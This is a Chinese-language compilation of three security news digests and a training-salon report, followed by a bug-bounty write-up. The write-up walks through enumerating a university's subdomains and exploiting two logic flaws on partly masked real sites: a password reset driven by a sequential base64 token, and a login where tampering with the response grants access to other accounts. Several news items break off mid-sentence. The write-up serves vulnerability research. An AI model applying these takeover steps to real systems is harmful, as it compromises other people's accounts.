1、研究人员发现利用Electron制作的恶意程序 https://asec.ahnlab.com/en/64445 研究人员发现了一种由Electron制成的窃密木马样本。Electron应用程序使用NSIS安装程序，攻击者利用Electron将恶意程序打包在NSIS安装程序中。研究人员发现两种案例：一种是攻击者将恶意代码添加至JS脚本中，由于Electron通过node.js与操作系统交互，因此攻击者利用这一点执行恶意代码，窃取用户的信息；第二种则是恶意程序伪装成TeamViewer相关文件并将收集到的用户信息上传到gofile中，上传的数据包括系统信息、浏览器历史记录以及保存的ID和密码信息。 2、Brocade SANnav中存在多个安全漏洞 https://www.securityweek.com/vulnerabilities-expose-brocade-san-appliances-switches-to-hacking 研究人员称，Brocade SANnav存储区域网络（SAN）管理应用程序中的多个漏洞可能被利用来破坏设备和光纤通道交换机。研究人员在该设备中总共发现了18个安全漏洞，包括未经身份验证的漏洞，允许远程攻击者以root身份登录易受攻击的设备。其中，有9个漏洞被分配了CVE标识符：CVE-2024-2859和CVE-2024-29960到CVE-2024-29967。研究人员称，其中三个问题可能允许攻击者发送 3、攻击者针对Okta进行撞库攻击 https://www.bleepingcomputer.com/news/security/okta-warns-of-unprecedented-credential-stuffing-attacks-on-customers Okta警告说，针对其身份和访问管理解决方案的撞库攻击激增，一些客户帐户在攻击中遭到破坏。攻击者使用凭据填充来破坏用户帐户，方法是以自动方式尝试从网络犯罪分子那里购买的用户名和密码列表。Okta表示，这些攻击中似乎使用了与Cisco Talos此前报道的暴力破解和密码喷射攻击中相同的基础设施。在Okta观察到的所有攻击中，请求都来自 TOR匿名化网络以及多种代理（ 4、Megazord勒索软件针对医疗和政府机构进行攻击 https://cybersecuritynews.com/megazord-ransomware-attacks Megazord是一种针对医疗保健、教育和政府机构、使用Rust开发的勒索软件。其传播通常始于鱼叉式网络钓鱼以及漏洞利用。其攻击者使用RDP和IP扫描器来检测受害者内部网络并横向移动，入侵后会在加密本地数据存储和文件之前终止进程和服务。该勒索软件对加密的文件添加“POWERRANGES”扩展名，并在每个受影响的文件夹中写入一个名为“powerranges.txt”的勒索信。该勒索信指示受害者使用唯一的Telegram频道链接通过TOX联系攻击者。此外，Megazord与Akir 5、朝鲜黑客组织攻击数十家韩国国防公司 https://therecord.media/south-korean-defense-companies-cyber-espionage-north-korea 韩国安全部门确定了三个平壤支持的组织对这些攻击负责，这些组织被全球执法和网络安全研究人员称为Lazarus、Kimsuky和Andariel。 6、英国莱斯特市遭遇网络攻击后城市路灯无法关闭 https://www.darkreading.com/cyberattacks-data-breaches/lights-on-in-leicester-city-streetlights-in-disarray-after-cyberattack 网络攻击后果的最新发展引起了当地人的关注，因为灯光使用的能源量很大，这可能会推高电力成本。埃文斯在一封电子邮件中被告知，灯光问题应在五月第一周结束前得到解决。 7、SpaceX 泄露近150GB数据，以及三千份图纸 https://www.freebuf.com/news/399567.html SpaceX 据称遭遇了一起网络安全事件。据报道，该事件与黑客组织 Hunters International 有关，该组织发布了 SpaceX 数据泄露的样本。此次泄露的数据为SpaceX 相对较旧的数据，Hunters International 在此次勒索事件中采用了 “指名道姓 ”的策略施加勒索压力。有趣的是，在 SpaceX 于 2023 年初面临的一次数据泄露事件中，也涉及到了这些样本，当时的泄露事件据称与 LockBit 勒索软件组织有关。 8、为遏制网络诈骗，日本警方在便利店投放虚假支付卡 https://www.freebuf.com/news/399593.html 由于近来网络诈骗较为猖獗，一些国家民众尤其是老年人难以具备充足的辨别能力，成为了网络诈骗分析的重点“集火”对象。对此，日本警方推出了一种假冒的”诈骗支付卡“，以提醒老年人不要上当受骗。这种卡片表面标有“病毒特洛伊木马清除支付卡”和“未付账单滞纳金支付卡”，目前已由日本福井县越前警察局制作并投放在了当地34家便利店。 9、印度ICICI银行暴露17000名客户的信用卡数据 https://securityaffairs.com/162479/security/icici-bank-technical-glitch.html ICICI 银行是印度领先的私人银行之一，意外地将数千张新信用卡的数据暴露给非预期接收者的客户。 10、伪造的npm 包用于诱骗软件开发人员安装恶意软件 https://thehackernews.com/2024/04/bogus-npm-packages-used-to-trick.html 一项正在进行的社会工程活动针对软件开发人员，以求职面试为幌子，使用伪造的 npm 软件包来诱骗他们下载 Python 后门。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

4月25日，由中共长沙市委网信办、长沙市工业和信息化局、长沙市总工会指导，长沙市网络空间安全和信息化协会、长沙市信息技术集成工会工委、长沙市国链安全可靠计算机产业促进中心主办的“长沙市首届网络安全工匠培养沙龙”在长沙富兴世界金融中心成功举办。来自网络空间安全相关产业、高校院所、企事业单位、实训基地、协会各会员代表等100余人参加会议，共谋网络安全人才培养美好蓝图。湖南蚁景科技有限公司作为专注网安人才培养的行业示范单位应邀出席此次活动。 市委网络安全和信息化委员会办公室四级调研员王春华出席活动并致辞。 活动中，网络安全工匠培训和比武计划正式发布。长沙将联合全市各部门单位、高校院所、研发机构、重点企业、实训基地等，以为建设全球研发中心城市提供网络安全保障为方向，全面推动长沙市网络安全工匠培训和比武计划行动，不断创新网络安全人才培养模式，共同助力长沙市网络安全人才数量和质量的提升。 会上，蚁景科技做了网络安全人才线上培训的经验分享，介绍了蚁景科技在“网安人才实训LPC计划”框架下，融合学、练、赛一体的网安人才培养创新模式。通过介绍“学、练、赛”三大维度下所涵盖的在线学习、实训演练、实验教学和竞赛等多个环节，阐述了蚁景科技打造的支撑“课程学习+实验实训+网安竞赛”的网安人才实战技能培养的全生态场景。 本次会议注重打通政策、产业、技术界限，对接网安人才培养与用人需求两侧，打造政、校、企、协多方参与的交流合作平台，进一步推动网安工匠相关工作落到实处，服务长沙网络安全产教融合技术试验区建设，助力新一代自主安全计算系统产业集群高质量发展。

0x01 信息收集 个人觉得教育src的漏洞挖掘就不需要找真实IP了，我们直接进入正题，收集某大学的子域名，可以用oneforall，这里给大家推荐一个在线查询子域名的网站：https://www.virustotal.com/ 收集到的子域名还是蛮多的，主要是子域名直接就可以复制到txt文件，方便后续域名探针。这里查询到700多个子域名。 子域名探针，我用的是Finger，网上有相应文章介绍安装，不再赘述，直接拿去跑，探针存活的站点 0x02 资产漏洞挖掘 我们需要对存活的站点进行查看，最严谨的做法是一一查看，找寻其中的漏洞，同时这样也最消磨我们这种小白的耐心，这里直接看Finger扫描输出文件里面的title，看是否带着 “系统”、“平台”、“登录”等字眼，这些站点是最好出漏洞的地方，因为他们往往存在登录框，可测的东西就多了。 最终锁定两个系统站点 0x03 任意账号密码重置 国际学生在线申请系统：https://***..edu.cn/user/login?configId=&sign= 有注册功能点就注册，没有就网上查询是否有默认密码进入，这里很幸运，有注册功能点，还不需要管理员审核，直接注册两个账号   账号1：typ123/Typ123456.   账号2：hhh123/Hhh123456. 登录typ123这个账号，进入系统，查找功能点，发现修改密码处，不需要原密码，感觉有洞可挖，直接BP抓包 BP请求响应包部分代码如下： token=Mjg5NjQ3&newPassword=Typ654321.&confirmPassword=Typ654321. token值进行base64解码，结果为：289647 登录hhh123账号，记录它的token值，有看没有什么规律 token=Mjg5NjQ2&newPassword=Hhh654321.&confirmPassword=Hhh654321. 解码为：289646 对比发现token值是按注册顺序逐一增大的 这里尝试将typ123的token值改为hhh123的，测试发现，成功修改hhh123账号的密码，一个逻辑漏洞到手 0x04 任意用户登录 汉字全息资源应用系统：https://***.bnu.edu.cn/#/ 这里同样注册两个账号 账号1：hhh123/hhh123456 账号2：typ123/typ123456 登录typ123账号，测试内部功能点，都测了一下，没有测出所以然，突然我想起之前看到的文章，抓登录请求返回包，说干就干，果然，有不一样的地方 {"code":200,"desc":"登陆成功！","result":"{\"token\":\"69565637941600f094864d0fcb4adbdd\",\"username\":\"typ123\",\"check\":\"0\",\"mail\":\"3215545898@qq.com\"}"} 这里我试着改一改参数，看登录有没有区别，试了一下，修改username值，就可以登录其他账号，直接将username值typ123改为hhh123 code":200,"desc":"登陆成功！","result":"{\"token\":\"69565637941600f094864d0fcb4adbdd\",\"username\":\"hhh123\",\"check\":\"0\",\"mail\":\"3215545898@qq.com\"}"} 成功，直接登录 又一个逻辑漏洞到手 0x05 总结 逻辑漏洞挖掘主打一个BP抓包，看请求包和请求返回包，分析包的代码，看有没有可以利用的参数，更改参数，不断尝试，去测试所有功能点,就会有意想不到的结果。

1、研究人员发现一种名为“Brokewell”的新型安卓恶意软件 https://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware 安全研究人员发现了一种新的安卓恶意软件，并将其命名为Brokewell。Brokewell仍在积极开发中，并具有设备接管和远程控制功能。研究人员在一个虚假的Chrome更新页面中发现了Brokewell，该页面将会诱导用户下载安装Brokewell。Brokewell的主要功能是窃取数据并为攻击者提供远程控制。研究人员称，Brokewell背后的开发人员是一个自称Baron Samedit的人。 2、研究人员称超过1400台CrushFTP服务器易受攻击 https://www.bleepingcomputer.com/news/security/over-1-400-crushftp-servers-vulnerable-to-actively-exploited-bug 研究人员发现，超过1400台在线暴露的CrushFTP服务器容易受到漏洞利用攻击，该漏洞曾被作为零日漏洞进行利用。CrushFTP在其托管文件传输软件中将CVE-2024-4040描述为VFS沙盒逃逸，攻击者能够利用该漏洞实现任意文件读取，未经身份验证的攻击者可以使用它在受影响的系统上进行远程代码执行（RCE）。安全研究人员发现了1401个存在该安全漏洞的在线CrushF 3、瑞典饮料供应商Skanlog遭受勒索软件攻击 https://cybernews.com/news/skanlog-ransomware-sweden-alcohol-supplier 瑞典饮料供应商Skanlog最近遭到勒索软件攻击。这次攻击影响了该公司的IT系统，导致3个大型饮料仓库无法将货物运送到Systembolaget的零售店。Systembolaget是一家国有连锁酒类商店，是瑞典唯一一家允许销售酒精含量超过3.5%的酒精饮料的连锁店。根据Systembolaget的声明，Skanlog的供应中断影响了该零售商四分之一的销售额。虽然目前不存在饮料短缺，但整体情况将取决于Skanlog恢复运营的速度。该供应商无法确定何时能够恢 4、攻击者滥用Autodesk Driver托管恶意PDF文件 https://www.netcraft.com/blog/autodesk-hosting-pdf-files-used-in-microsoft-phishing-attacks Autodesk Drive是一个数据共享平台，供组织在云中共享文档和文件。研究人员近期发现一个攻击活动，该活动滥用Autodesk Driver平台来托管恶意PDF文件，从而对受害者进行网络钓鱼攻击。攻击者针对目标用户发送钓鱼邮件，当受害者单击这些电子邮件中的Autodesk Driver链接时，他们将看到链接中的PDF文档，该文档中嵌入了另一个网络钓鱼链接，该链接指向一个虚假的微软登录页面中，旨在窃取受害者 5、谷歌推出Chrome 124以修复多个安全漏洞 https://cybersecuritynews.com/chrome-critical-security-update 谷歌宣布发布Chrome 124，在该版本中修复了四个漏洞，包括一个允许攻击者执行任意代码的关键安全问题。一个严重的安全漏洞是CVE-2024-4058，涉及ANGLE图形层引擎中的类型混淆。该漏洞可用于远程执行任意代码或执行有限的用户交互沙盒逃逸。此外，Chrome还修复了CVE-2024-4059、CVE-2024-4060高严重性漏洞。谷歌建议用户尽快将Chrome更新到最新版本，以降低安全风险。 6、PlugX又有新变种，感染250万个服务器 https://www.freebuf.com/news/399440.html bleepingcomputer网站消息，近日，网络安全公司Sekoia的研究人员成功接管了一个PlugX恶意软件变种的命令和控制（C2）服务器，六个月内监测到超过250万个独立IP地址的连接。自去年9月Sekoia公司捕获了与特定C2服务器相关联的唯一IP地址以来，这个服务器每天都会收到来自超过170个国家感染主机的9万多个请求。 7、OWASP 发布十大开源软件风险清单 https://www.freebuf.com/news/398276.html 近日，OWASP发文称，尽管软件供应链对开源软件 (OSS) 的依赖程度很高，但业内缺乏一致的用于了解和衡量OSS风险的方法。OSS 风险管理始于许可管理，之后延伸至CVE，但我们仍然缺乏与安全、法律和运营相关的全面的OSS风险管理方式。 8、从10到1000，“教父”系列银行木马变种近两年内疯狂激增 https://www.freebuf.com/news/399446.html 在全球广泛传播的“教父”（Godfather）系列银行木马已经衍生出超1000个变种样本，针对上百个移动端银行应用程序。“教父”银行木马首次发现于2022年，具备记录屏幕和键盘输入、拦截双因素身份验证（2FA）电话和短信、发起银行转账等功能，已迅速成为网络犯罪（尤其是移动网络犯罪）中最普遍的恶意软件即服务产品之一。 9、WP-Automatic插件因漏洞遭遇数百万次 SQL 注入攻击 https://www.freebuf.com/news/399427.html 黑客目前正积极利用 WordPress 的 WP Automatic 插件中的一个严重漏洞来创建具有管理权限的用户账户，并植入后门以实现长期访问。WP Automatic 现已被安装在 30000 多个网站上，让管理员自动从各种在线资源导入内容（如文本、图片、视频），并在WordPress 网站上发布。该漏洞被认定为 CVE-2024-27956，严重程度为9.9/10。 10、Google Chrome 再次推迟淘汰第三方 Cookie https://digiday.com/marketing/google-delays-third-party-cookie-demise-yet-again/ Google 今年一月开始按照计划对 1% 的 Chrome 用户禁用第三方 Cookie。根据 Google 的计划，初步测试完成之后 Google 将会逐步扩大范围，直到对所有用户完全禁用第三方 Cookie。这一计划预计会在年底完成。但本周 二 Google 再次宣布了推迟，最新的时间表是明年初。原因是第三方 Cookie 的替代隐私沙盒（Privacy Sandbox）面临更多的监管审查。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、MuddyWater组织利用RMM工具传播恶意软件 https://harfanglab.io/en/insidethelab/muddywater-rmm-campaign/ 研究人员表示，至少至2021年以来，MuddyWater组织一直依赖合法的远程监控和管理（RMM）软件进行网络攻击活动，包括ScreenConnect、Syncro、SimpleHelp、RemoteUtilies以及最近的Atera Agent。近期MuddyWater组织在攻击活动中利用Atera的免费试用版本。在此活动中看到的Atera Agent使用了受感染的商业和私人电子邮件账户进行注册。研究人员认为攻击者可能通过各种方法获取这些帐户，例如密码喷射、利用重复 2、WordPress插件WP Datepicker中存在安全漏洞 https://cybersecuritynews.com/wordpress-plugin-flaw/ WordPress插件WP Datepicker中存在一个安全漏洞，影响了超过10000个使用该插件的网站。该漏洞被标记为CVE-2024-3895，CVSS评分为8.8。具有订阅者级及以上访问权限的经过身份验证的攻击者可利用该漏洞更新任意选项，并利用这些选项进行权限提升。此类攻击可能允许攻击者创建管理员帐户，从而对受影响的网站构成重大风险。该漏洞是在WP Datepicker插件中发现的，该插件是一种广泛使用的工具，用于管理WordPress表单中的日期和时间输入。该漏洞存在于2.1. 3、IBM QRadar套件中存在安全漏洞 https://cybersecuritynews.com/ibm-qradar-xss-flaw/ IBM QRadar Suite Software和Cloud Pak for Security中存在安全漏洞，允许攻击者执行任意JavaScript代码。攻击者可以通过存储的跨站点脚本将恶意的可执行脚本插入到网站的代码中，从而对受影响的产品造成影响。该漏洞被标记为CVE-2023-47731，CVSS评分为5.4，是一种中危XSS漏洞。该漏洞影响IBM Cloud Pak for Security的1.10.0.0至1.10.11.0版本以及IBM QRadar Suite Softwar 4、Progress Flowmon中存在安全漏洞 https://www.bleepingcomputer.com/news/security/maximum-severity-flowmon-bug-has-a-public-exploit-patch-now/ Progress Flowmon具备性能跟踪、诊断以及网络检测和响应功能，被全球1500多家公司使用。该产品中存在一个安全漏洞，被标记为CVE-2024-2389，CVSS评分为10/10。攻击者可利用该漏洞使用特制的API请求，获得对Flowmon Web界面的未经身份验证的远程访问并执行任意系统命令。Progress Software已就该漏洞发出警报，警告它会影响产品v12 5、数亿条 Discord 用户的个人信息正被出售 https://www.freebuf.com/news/399310.html 一家名为Spy.pet互联网搜索公司自 2023 年 11 月以来一直在抓取并收集 Discord 用户数据，数量已达40亿条，这些信息可公开访问，分别从 14201 台服务器上收集，而这些服务器上累计有超过6亿名用户。 6、美国通过Tiktok剥离法案，不剥离将被禁用 https://www.freebuf.com/news/399302.html 当地时间4月23日晚，美国参议院通过了《保护美国人免受外国对手控制的应用程序法案》（即“Tiktok剥离法案”），并于24日由美国总统拜登签署成为法律，并正式生效。根据该法，如果字节跳动公司一年内不肯剥离其在美国的业务，将面临被禁用的命运。 7、欧洲刑警组织就重大犯罪案件中访问加密数据寻求解决方案 https://thehackernews.com/2024/04/police-chiefs-call-for-solutions-to.html 欧洲刑警组织指出，当前推行的隐私措施，如端到端加密，将阻止科技公司看到其平台上发生的任何违法行为。这也将剥夺执法部门获取和运用这些证据以阻止和起诉最严重的犯罪行为，包括儿童性虐待、人口贩卖、毒品走私、凶杀案、经济犯罪和恐怖主义罪行。 8、GitHub曝漏洞，可被黑客利用伪装成“微软”分发恶意软件 https://www.ithome.com/0/763/606.htm GitHub 目前已经删除了部分恶意软件链接，对尚未完全修复该漏洞。对于开发者而言，现阶段没有足够有效的方法阻止这种滥用，唯一的方案就是完全禁用 comment。 9、输入法重大漏洞曝光，仅华为幸免，近10亿用户受影响 https://www.freebuf.com/news/399237.html 近日，Citizenlab研究人员调查了多家厂商的输入法应用安全漏洞并报告称：除华为以外，百度、荣耀、科大讯飞、OPPO、三星、腾讯、Vivo和小米等供应商的九款应用程序中有八款均存在安全漏洞。 10、DOJ 逮捕了混币器Samourai创始人，因协助20亿美元的非法交易 https://securityaffairs.com/162279/cyber-crime/doj-seized-crypto-mixer-samourai.html 美国司法部 (DoJ) 逮捕了加密货币混合器 Samourai 的两名联合创始人，并查封了该服务。这些指控包括协助超过 20 亿美元的非法交易和洗钱超过 1 亿美元的犯罪所得。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。